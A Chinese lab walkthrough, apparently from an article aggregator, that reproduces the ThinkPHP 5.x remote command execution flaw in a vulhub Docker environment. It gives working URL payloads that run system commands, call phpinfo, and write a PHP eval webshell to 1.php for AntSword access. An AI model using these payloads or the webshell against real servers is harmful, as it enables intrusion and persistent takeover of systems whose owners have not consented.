当前位置: 首页 > article >正文

Thinkphp5x远程命令执行 靶场攻略

article 2024/9/30 18:31:22

环境配置

靶场:vulhub/thinkphp/5-rce

docker-compose up -d #启动环境

漏洞复现

1.访问靶场:http://172.16.1.198:8080/

2.远程命令执⾏

POC:

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]

[]=whoami

3.远程代码执行

POC:
?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[
1][]=-1

4.写入一句话木马到根目录下的1.php

POC:
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval(\$_POST[cmd]);?>" > 1.php

5.蚁剑连接

 


http://www.kler.cn/news/322693.html

相关文章:

  • vue使用PDF.JS踩的坑--部署到服务器上显示pdf.mjs viewer.mjs找不到资源
  • Elasticsearch黑窗口启动乱码问题解决方案
  • 同声传译软件推荐哪个好?这些工具助你提升翻译效率
  • 物联网系统中声音拾取音频方案_咪头
  • element plus block报错
  • “创新驱动·融合发展”长三角软件产业盛会“2024南京软博会”
  • neo4j关系的创建删除 图的删除
  • Linux `readlink` 命令详解:轻松解析符号链接
  • C++在线开发环境搭建(WEBIDE)
  • 风景视频素材高清无水印怎么找?推荐几个风景视频素材下载网站
  • uniapp APP自动更新组件
  • 华为的数据库安全审计的功能怎么样?
  • Java后端面试题(微服务相关2)(day13)
  • DRF实操学习——收货地址的设计
  • Oracle逻辑备份脚本【生产环境适用】
  • 深入浅出CSS盒子模型
  • 命令行基础指令速查(Linux/Mac适用)
  • 【HTTP 和 HTTPS详解】2
  • 【30天玩转python】并发编程
  • 黎巴嫩BP机爆炸事件启示录:我国应加快供应链安全立法
  • 理论-同步、异步、阻塞、非阻塞
  • 微信小程序 - 最新详细安装使用 Vant weapp UI 框架环境搭建详细教程
  • 蓝桥杯15届C/C++B组省赛题目
  • Python的包管理工具pip安装
  • 【前端】ES13:ES13新特性
  • 人工智能开发实时语音识别系统应用
  • 试用Debian12.7和Ubuntu24.4小札
  • 计算机网络--HTTP协议
  • 酒店智能门锁SDK接口pro[V10] 对接酒店收银-模块封装C#-SAAS本地化-未来之窗行业应用跨平台架构
  • C++ 类与对象(上)